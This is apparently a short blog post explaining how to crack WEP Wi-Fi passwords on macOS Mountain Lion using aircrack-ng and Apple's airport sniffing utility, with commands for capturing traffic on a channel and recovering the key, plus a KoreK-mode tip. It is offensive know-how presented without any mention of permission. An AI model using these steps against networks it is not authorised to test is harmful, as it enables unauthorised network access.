Running airmon-ng in mountain lion!

aircrack-ngFor those of you who have no clue what is all of this about, Aircrack-ng is a command line tool that allows you to bruteforce WEP and WPA wi-fi password protections.

WEP being the easiest protection to break, and WPA the hardest. The difference?. WEP can be broken in… two days, give or take (probably less than that), while WPA could take months… without results!. Personally, everytime i needed to break a WEP protection, i had to boot a linux system. If you’re like me, and you’d rather staying in OSX, this is juuuuust for you.

I don’t wanna forget about this, so i’m writing this short guide, right here!

  1. Install Macports.
  2. Install aircrack-ng:[cc lang=”bash”]sudo port install aircrack-ng[/cc]
  3. Install the latest Xcode, with the Command Line Tools.
  4. Create the following symlink:[cc lang=”bash”]sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport[/cc]
  5. Figure out which channel you need to sniff:[cc lang=”bash”]sudo airport -s[/cc]
  6. Open up a terminal and type:[cc lang=”bash”]sudo airport en1 sniff [CHANNEL][/cc]
  7. Open up a seecond terminal and type:[cc lang=”bash”]aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE][/cc]

Notes: the cap_file will be located in the /tmp/airportSniff*.cap.
Nice, right?

===========================
Update:

I’ve been having issues while trying to crack a WEP key. I had over 100k IV’s… without luck. So i’ve attepted to crack the key with the KoreK algorithm (coded in aircrack-ng). And guess what!! i got the key!!. If you ever have the same problem, try this:

[cc lang=”bash”]aircrack-ng -K -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE][/cc]

%d